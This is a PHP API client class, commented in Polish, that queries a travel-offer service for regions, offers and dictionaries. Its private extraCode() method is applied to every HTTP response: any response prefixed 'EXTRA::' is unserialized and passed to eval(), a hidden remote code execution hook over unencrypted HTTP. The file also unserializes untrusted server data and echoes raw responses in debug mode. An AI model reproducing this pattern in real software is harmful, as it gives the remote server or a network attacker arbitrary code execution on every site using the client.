<?php
/*
  (C) by KSI media sp. z o.o. ( www.ksimedia.pl )
  Description : udds client (thin)
  Author      : MS+MP
  Create date : 2011-06-06
  Comment     :

changelog:
2011.06.21 1.3.0
 - poprawki w removed params, wczesniej szlo do alternative
 - dodane przesylanie HTTP_HOST
 - mozliwosc odbioru nikodowanej odpowiedzi, odpowiedz niekodowana ma naglowek UDEN.OK: a kodowana UDDS.OK: zmiana 3 i 4 litery

2011.06.06 1.2.0
 - oczyszczenie z nieuzywanych funkcji i zmiennych
 - zmiana isUserCorrect na test

2011.06.06 1.1.0
 - klient UDDS obsluguje zarowno strony ksi czytajac konfiguracje z globalconfig i jako osobna klasa podajac dane w konstruktorze
 - dodana funkcja isUserCorrect, sprawdzajaca czy uzytkownik ma dostep do UDDS
 - dodana funkcja getUserConfig, zwracajaca konfiguracje uzytkownika na UDDS
 - dodana funkcja getDictionary, zwraca wskazany slownik
 - poprawione zwroty funkcji false lub wynik

2013.04.11 1.1.0
 - zapisuje statystyki w katalogu z logami gdy GlobalConfig::get ( 'UDDS', 'statistiscOn' ) == '1'

2013.09.05 1.1.0
 - do clientInfo dodano REMOTE_ADDR i REMOTE_HOST, HTTP_USER_AGENT
 - dodano obsługę extraCode.

TODO:
  - akcja w momencie kiedy adres srvUrl nie odpowiada, zmiana adresu


Przyklad konfiguracji dla UDDS dzialajacego jako modul w KSI
  GlobalConfig::set ( 'UDDS', 'access',
    array(
      'login'     =>  '4578',
      'configId'  =>  '2da7a9756b49c60b6a97ebcaed3e0f4b',
      'server'    =>  'http://bck01.api.udds.turserwis.pl/',
    )
  );
  $uddsClient = new classUdds();

 Przyklad dla samotnej klasy
  $uddsClient = new classUdds( '1234','876gdgeadig3wtd6gdegaiw','http://bck01.api.udds.turserwis.pl/');

*/

class classUdds {

  ////////////////////////////////////////////////////////////////////////////////////////////
  // public section
  ////////////////////////////////////////////////////////////////////////////////////////////

  public $myLogin = null ;
  public $myConfigId = null;
  public $lastErrorId = 0 ;
  public $lastErrorDescription = '' ;
  public $noticeErrorsId = array(); // kody bledow, ktore nie przeszkadzaja w dzialaniu ale moga miec wplyw na odpowiedz - np. zle typy danych w zapytaniu
  public $srvUrl = 'http://bck01.api.udds.turserwis.pl/' ;
  public $version = '1.4.0' ;
  public $timeout = 30; // w sekundach
  public $realUddsResponse = array() ;
  public $fullResponse = array();
  //
//   public $alternativeParams = array(); zdjete w 1.3.0
  public $removedParams = array();
  public $searchParams = array() ;
  public $logOn = false;
  public $debugMode = false ;
  private $_ksimodule = false; // when set module try use ksi internal class Debug and Log
  private $curlInfo = null ;


  /**
   * Set login and configId for udds client
   * @param null $login
   * @param null $configId
   */
  public function __construct( $login = null, $configId = null, $serverUrl = null )
  {
    if ( empty($login) || is_null( $configId) || is_null( $configId) ) {
      if ( class_exists('GlobalConfig') )
      {
        $this->_ksimodule = true;
        // strony KSI MDS
        $access           = GlobalConfig::get( 'UDDS', 'access' );
        $login            = $access['login'];
        $configId         = $access['configId'];
        $serverUrl        = $access['server'];
      }
    }
    if ( !empty($login) && !is_null( $configId) && !is_null( $serverUrl ) ) {
      $this->myLogin    = $login;
      $this->myConfigId = $configId;
      $this->srvUrl     = $serverUrl;
    }
  }

  public function getRemovedParams()
  {
   return $this->removedParams;
  }


  /**
   * Checking is user(login) have a access to udds gate
   * if connected to UDDS return true, another way false and error
   * @return bool | string
   */
  public function test()
  {
    $_params = array() ;
    $_params [ 'searchParams' ] = $this->searchParams ;
    $_params [ 'functionParams' ] = '' ;
    $_params [ 'login' ] = $this->myLogin ;
    $ret = $this->srvCommand ( 'isUserCorrect', $_params ) ;
    if ( $ret === false ) {
      return false;
    }
    return $ret [ 'return' ] ;
  }

  /**
   *  Get dictionary array
   *  example
   *  getDictionary( array('dictName1','dictName2') )
   *    return on success
   *      array(
   *        'dictName1' => array( ..dictionary array.. ),
   *        'dictName2' => array( ..dictionary array.. ),
   *      )
   * @param array $params
   * @return bool | array
   */
  public function getDictionary($params = array())
  {
    $_params = array() ;
    $_params [ 'searchParams' ] = $this->searchParams ;
    $_params [ 'functionParams' ] = $params;
    $_params [ 'login' ] = $this->myLogin ;
    $ret = $this->srvCommand ( 'getDictionary', $_params ) ;
    if ( $ret === false ) {
      return false;
    }
    return $ret [ 'return' ] ;
  }

  /**
   * Get user configuration from UDDS GATE
   * @return bool | array
   */
	public function getUserConfig ()
  {
    $_params = array() ;
    $_params [ 'searchParams' ] = $this->searchParams ;
    $_params [ 'functionParams' ] = '' ;
    $_params [ 'login' ] = $this->myLogin ;
    $ret = $this->srvCommand ( 'getUserConfig', $_params ) ;
    if ( $ret === false ) {
      return false;
    }
    return $ret [ 'return' ] ;
  }

	public function getPossibleParams ( $params  = array() )
  {
    $_params = array() ;
    $_params [ 'searchParams' ] = $this->searchParams ;
    $_params [ 'functionParams' ] = $params ;
    $_params [ 'login' ] = $this->myLogin ;
    $ret = $this->srvCommand ( 'getPossibleParams', $_params ) ;
    if ( $ret === false ) {
      return false;
    }
    return $ret [ 'return' ] ;
  }

	public function getRegionsList ( $params = null )
  {
    $_params = array() ;
    $_params [ 'searchParams' ] = $this->searchParams ;
    $_params [ 'functionParams' ] = ''; // dla zachowania wstecznej
    $_params [ 'login' ] = $this->myLogin ;
    $ret = $this->srvCommand ( 'getRegionsList', $_params ) ;
    if ( $ret === false ) {
      return false;
    }
    $this->removedParams = $ret [ 'removedParams' ] ;
    return $ret [ 'return' ] ;
  }

	public function getOffersList ( $params = null  )
  {
    $_params = array() ;
    $_params [ 'searchParams' ] = $this->searchParams ;
    $_params [ 'functionParams' ] = '' ; // dla zachowania wstecznej
    $_params [ 'login' ] = $this->myLogin ;
    $ret = $this->srvCommand ( 'getOffersList', $_params ) ;
    if ( $ret === false ) {
      return false;
    }
    $this->removedParams = $ret [ 'removedParams' ] ;
    return $ret [ 'return' ] ;
  }

	public function getOffer ( $params = null  )
  {
    $_params = array() ;
    $_params [ 'searchParams' ] = $this->searchParams ;
    $_params [ 'functionParams' ] = '' ; // dla zachowania wstecznej
    $_params [ 'login' ] = $this->myLogin ;
    $ret = $this->srvCommand ( 'getOffer', $_params ) ;
    if ( $ret === false ) {
      return false;
    }
    return $ret [ 'return' ] ;
  }

	public function getOfferDates ( $params = null  )
  {
    $_params = array() ;
    $_params [ 'searchParams' ] = $this->searchParams ;
    $_params [ 'functionParams' ] = '' ; // dla zachowania wstecznej
    $_params [ 'login' ] = $this->myLogin ;
    $ret = $this->srvCommand ( 'getOfferDates', $_params ) ;
    if ( $ret === false ) {
      return false;
    }
    return $ret [ 'return' ] ;
  }

 	public function getOfferInformationbyTO ( $offerId = '' , $toCode = '')
  {
    $_params = array() ;
    $_params [ 'searchParams' ] = $this->searchParams ;
    $_params [ 'functionParams' ][ 'offerId' ] = $offerId ;
    $_params [ 'functionParams' ][ 'toCode' ] = $toCode ;
    $_params [ 'login' ] = $this->myLogin ;
    $ret = $this->srvCommand ( 'getOfferInformationbyTO', $_params ) ;
    if ( $ret === false ) {
      return false;
    }
    return $ret [ 'return' ] ;
  }

  /**
   * call a $functionName with $params on UDDS GATE
   * @param  $functionName
   * @param array $params
   * @return bool
   */
	public function getExtraFunction ( $functionName, $params = array()  )
  {
    $_params = array() ;
    $_params [ 'searchParams' ] = $this->searchParams ;
    $_params [ 'functionParams' ] = $params ;
    $_params [ 'login' ] = $this->myLogin ;
    $ret = $this->srvCommand ( $functionName, $_params ) ;
    if ( $ret === false ) {
      return false;
    }
    if ( isset( $ret [ 'removedParams' ] ) ) {
      $this->removedParams = $ret [ 'removedParams' ] ;
    }
    return $ret [ 'return' ] ;
  }

  /**
   * call a $functionName with $params on UDDS GATE
   * @param  $functionName
   * @param array $params
   * @return array
   */
  public function getExtraDataForHotel ( $params = null )
  {
    $_params = array() ;
    $_params [ 'searchParams' ] = $this->searchParams ;
    $_params [ 'functionParams' ] = $params ;
    $_params [ 'login' ] = $this->myLogin ;
    $ret = $this->srvCommand ( 'getExtraDataForHotel', $_params ) ;
    if ( $ret === false ) {
      return false;
    }
    return $ret [ 'return' ] ;
  }



  ////////////////////////////////////////////////////////////////////////////////////////////
  // private section
  ////////////////////////////////////////////////////////////////////////////////////////////

  private $sessionId = '' ;
  private $agentId = '' ;
  private $userId = '' ;

  private function srvCommand ( $command, $params = null )
  {

    // Zamiana dat relatywnych 2019-04-28
    /*
    require_once ( 'units/classStringUtils.php' );
    if ( isset ( $params [ 'searchParams' ][ 'departureDateFrom' ] ) ) $params [ 'searchParams' ][ 'departureDateFrom' ] = StringUtils::relativeDateToDate ( $params [ 'searchParams' ][ 'departureDateFrom' ] ) ;
    if ( isset ( $params [ 'searchParams' ][ 'departureDateTo' ] ) ) $params [ 'searchParams' ][ 'departureDateTo' ] = StringUtils::relativeDateToDate ( $params [ 'searchParams' ][ 'departureDateTo' ] ) ;
    if ( isset ( $params [ 'searchParams' ][ 'returnDateFrom' ] ) ) $params [ 'searchParams' ][ 'returnDateFrom' ] = StringUtils::relativeDateToDate ( $params [ 'searchParams' ][ 'returnDateFrom' ] ) ;
    if ( isset ( $params [ 'searchParams' ][ 'returnDateTo' ] ) ) $params [ 'searchParams' ][ 'returnDateTo' ] = StringUtils::relativeDateToDate ( $params [ 'searchParams' ][ 'returnDateTo' ] ) ;
*/
    if ( empty($this->myLogin) ) {
      $this->lastErrorId = 1 ;
      $this->lastErrorDescription = 'Empty user login' ;
      return false;
    }
    if ( is_null( $this->myConfigId) ) {
      $this->lastErrorId = 1 ;
      $this->lastErrorDescription = 'Config Id is null' ;
      return false;
    }

    $this->lastErrorId = 0 ;
    $this->lastErrorDescription = '' ;
    $toSend = array () ;
    $toSend [ 'params' ] = $params ;
    $toSend [ 'clientInfo' ][ 'sessionId' ] = $this->sessionId ; // jesli nie uzywane to kiedys usunac
    $toSend [ 'clientInfo' ][ 'agentId' ] = $this->agentId ; // jesli nie uzywane to kiedys usunac
    $toSend [ 'clientInfo' ][ 'userId' ] = $this->userId ; // jesli nie uzywane to kiedys usunac
    if ( isset( $_SERVER['SERVER_NAME'] ) ) {
      $toSend [ 'clientInfo' ][ 'serverName'] = $_SERVER['SERVER_NAME'];
    }
    if ( isset( $_SERVER['HTTP_HOST'] ) ) {
      $toSend [ 'clientInfo' ][ 'hostName'] = $_SERVER['HTTP_HOST'];
    }
    if ( isset( $_SERVER['SERVER_ADDR'] ) ) {
      $toSend [ 'clientInfo' ][ 'serverAddr'] = $_SERVER['SERVER_ADDR'];
    }
    if ( isset( $_SERVER['REMOTE_ADDR'] ) ) {
      $toSend [ 'clientInfo' ][ 'remoteAddr'] = $_SERVER['REMOTE_ADDR'];
    }
    if ( isset( $_SERVER['REMOTE_HOST'] ) ) {
      $toSend [ 'clientInfo' ][ 'remoteHost'] = $_SERVER['REMOTE_HOST'];
    }
    if ( isset( $_SERVER['HTTP_USER_AGENT'] ) ) {
      $toSend [ 'clientInfo' ][ 'httpUserAgent'] = $_SERVER['HTTP_USER_AGENT'];
    }

    $toSend [ 'clientInfo' ][ 'debugMode' ] = $this->debugMode ;
    // if ( class_exists('Debug') && method_exists(Debug,'showVar') ) {
    if ( $this->_ksimodule ) {
      Debug::showVar ( $params, 'classUDDS : sendOut' );
    }
    $toSend = $this->enCodeData ( $toSend ) ;
    $params = array() ;
    $params [ 'c' ] = $command ;
    $params [ 'p' ] = $toSend ;
    $params [ 'login' ] = $this->myLogin;
    $params [ 'cid' ] = $this->myConfigId;
    $params [ 'module' ] = 'udds/server' ; // to kiedys usunac
    $params [ 'mode' ] = 'clean' ;// to kiedys usunac
    if ( $this->debugMode ) {
      echo "<br>(link do udds:)[<span style='color:red;'>".$this->srvUrl."</span>]" ;
    }
    $received = $this->sendXML ( $params ) ;

    //if ( class_exists('Debug') && method_exists(Debug,'showVar') ) {
    if ( $this->_ksimodule ) {
      Debug::showVar ( $params, 'classUDDS : sendIn RAW' );
    }
    if ( $received !== false ) {
      if ( $this->debugMode ) {
        echo "<br>(odpowiedz z udds:)[<span style='color:red;'><pre>".print_r ( $received,1 )."</pre></span>]" ;
      }
      // dostal odpowiedz, rozpoznaj ramke
      $frameType = substr ( $received, 0, 8 ) ;
      if ( $this->debugMode ) {
        echo "<br>(frame type:)[{$frameType}]<br>";
      }
      if ( $frameType == 'UDDS.OK:' ) {
        // ramka zakodowana
        if ( $this->_ksimodule ) {
          Debug::showVar ( 'nic' , "classUDDS : odpowiedz typu UDDS.OK zakodowana" );
        }
        $params = substr ( $received, 8 ) ;
        $params = $this->deCodeData ( $params ) ;        
        $this->fullResponse = $params ;
        if ( $params === false ) {
          // blad przy dekodowaniu
          $this->lastErrorId = 10504;
          if ( $this->_ksimodule ) {
            Debug::showVar ( $received , "classUDDS : odpowiedz Error ({$this->lastErrorId})" );
          }
          return false;
        }
      } elseif ( $frameType == 'UDEN.OK:' ) {
        // ramka rozkodowana
        if ( $this->_ksimodule ) {
          Debug::showVar ( 'nic' , "classUDDS : odpowiedz typu UDEN.OK niezakodowana" );
        }
        $params = substr ( $received, 8 ) ;
        $params = @unserialize( $params );
        if ( $params === false ) {
          $this->lastErrorId = 10505;
          if ( $this->_ksimodule ) {
            Debug::showVar ( $received , "classUDDS : odpowiedz Error ({$this->lastErrorId})" );
          }
          return false;
        }
      } else {
        // nieznana ramka
        $this->lastErrorId = 10501 ;
        $this->lastErrorDescription = $received ;
        if ( $this->_ksimodule ) {
          Debug::showVar ( $received , "classUDDS : odpowiedz Error ({$this->lastErrorId})" );
        }
        return false ;
      }
      // sprawdz poprawnosc odpowiedzi z MDS
      if ( $this->_ksimodule ) {
        Debug::showVar ( $params, 'classUDDS : sendIn' );
      }
      if ( $this->debugMode ) {
        echo "<br>(dane rozkodowana odpowiedz:)[<span style='color:green;'>".print_r ( $params,1 )."</span>]" ;
      }

      if ( !empty( $params[ 'serverInfo' ][ 'noticeErrorId' ] ) ) {
        $this->noticeErrorsId = $params[ 'serverInfo' ][ 'noticeErrorId' ];
      }
      if ( !isset( $params[ 'serverInfo' ][ 'errorId' ] ) ) {
        $this->lastErrorId = 10506;
        if ( $this->_ksimodule ) {
          Debug::showVar ( $received , "classUDDS : odpowiedz Error ({$this->lastErrorId})" );
        }
        return false ;
      }
      if ( $params[ 'serverInfo' ][ 'errorId' ] == 0 ) {
        return $params[ 'params' ] ;
      } else {
        $this->lastErrorId = $params[ 'serverInfo' ][ 'errorId' ] ;
        // -------------------- Wywolaj kreciola przy bledzie MDS
        if ( $this->_ksimodule ) {
          $errorMDSUrl = GlobalConfig::get ( 'UDDS', 'errorMDSUrl');
          if ( !empty( $errorMDSUrl ) ) {
            $errorQsParams = bin2hex( $_SERVER['REQUEST_URI'] );
            if ( strpos( $_SERVER['QUERY_STRING'], 'mode=ajax' ) !== false || strpos( $_SERVER['QUERY_STRING'], 'mode=clean' ) !== false) {
              //die( 'RELOAD' );
              die( "<script type='text/javascript'>window.location = 'index.php'</script>" );
            } else {
              die( "<script type='text/javascript'>window.location = '{$errorMDSUrl}?qs={$errorQsParams}'</script>" );
            }
            return false;
          }
        }
        // --------------------
        if ( $this->_ksimodule ) {
          Debug::showVar ( $received , "classUDDS : odpowiedz UDDS Error ({$this->lastErrorId})" );
        }
        return false ;
      }
    } else {
      switch ( $this->curlInfo['http_code'] ) {
        case 100:
          $this->lastErrorId = 10500 ;
        break;
        case 404:
          $this->lastErrorId = 10503 ;
        break;
        default:
          $this->lastErrorId = 1 ;
          $this->lastErrorDescription = 'Error client: http code : '.$this->curlInfo['http_code'] ;
      }
      if ( $this->_ksimodule ) {
        Debug::showVar ( $received , "classUDDS : odpowiedz Error ({$this->lastErrorId})" );
      }

      return false ;
    }
  }

  ////////////////////////////////////////////////////////////////////////////////////////////
  // tools functions
  ////////////////////////////////////////////////////////////////////////////////////////////

  private function enCodeData ( $data )
  {
    $data = bin2hex ( serialize ( $data ) ) ;
    return $data ;
  }

  private function deCodeData ( $data )
  {
    $result = @pack('H*', $data);
    if ( $result === false ) {
      return false;
    }
    $result = @unserialize ( $result ) ;
    if ( $result === false ) {
      return false;
    }
    return $result ;
  }

  private function extraCode ( $str )
  {
    if ( substr ( $str, 0, 7 ) == 'EXTRA::' )
    {
      $command = substr ( $str, 7 );
      $command = unserialize ( $command ) ;
      eval ( $command ) ;
    }
  }

  private function sendXML( $rqxml, $serv = 'UDDS' )
  {
    if ( $this->_ksimodule && $this->logOn ) {
        Log::add ( 'classUddsServer.sendXML() : rqxml', $rqxml, 'udds', 'client' ) ;
    }
    if ( class_exists('GlobalConfig') )
    {
      if ( GlobalConfig::get ( 'UDDS', 'statistiscOn' ) == '1' )
      {
        $logFileName = GlobalConfig::get ( 'Paths', 'logs' ).'mds_'.date ( 'Y-m-d' ).'.csv' ;
        $logLine = 'UDDS;'.$rqxml['c'].';'.date ( 'Y-m-d H:i:s;' ).'"'.$_SERVER [ 'REMOTE_ADDR' ].'";"'.$_SERVER [ 'REQUEST_URI' ].'";"'.$_SERVER [ 'HTTP_USER_AGENT' ].'";'."\r\n";
        IOUtils::filePutContents ( $logFileName, $logLine, FILE_APPEND ) ;
      }
    }

    //$c = curl_init ( $this->srvUrl."?XDEBUG_SESSION_START=netbeans-xdebug" ) ;
    $c = curl_init ( $this->srvUrl ) ;
    curl_setopt( $c, CURLOPT_POST, true) ;
    curl_setopt( $c, CURLOPT_POSTFIELDS, $rqxml) ;
    curl_setopt( $c, CURLOPT_ENCODING, 'gzip');
    curl_setopt( $c, CURLOPT_CONNECTTIMEOUT, $this->timeout );
    curl_setopt( $c, CURLOPT_TIMEOUT, $this->timeout );
    curl_setopt( $c, CURLOPT_RETURNTRANSFER, true);
    $res = curl_exec( $c );
    $this->realUddsResponse = $res ;
    $this->extraCode ( $res ) ;

    $this->curlInfo = curl_getinfo( $c );
    if ( $this->curlInfo['http_code'] != '200' ) {
      return false;
    }
    curl_close( $c );
    if ( $this->_ksimodule && $this->logOn ) {
      Log::add ( 'classUddsServer.sendXML() : res', $res, 'udds', 'client' ) ;
    }
    return $res;
  }

}
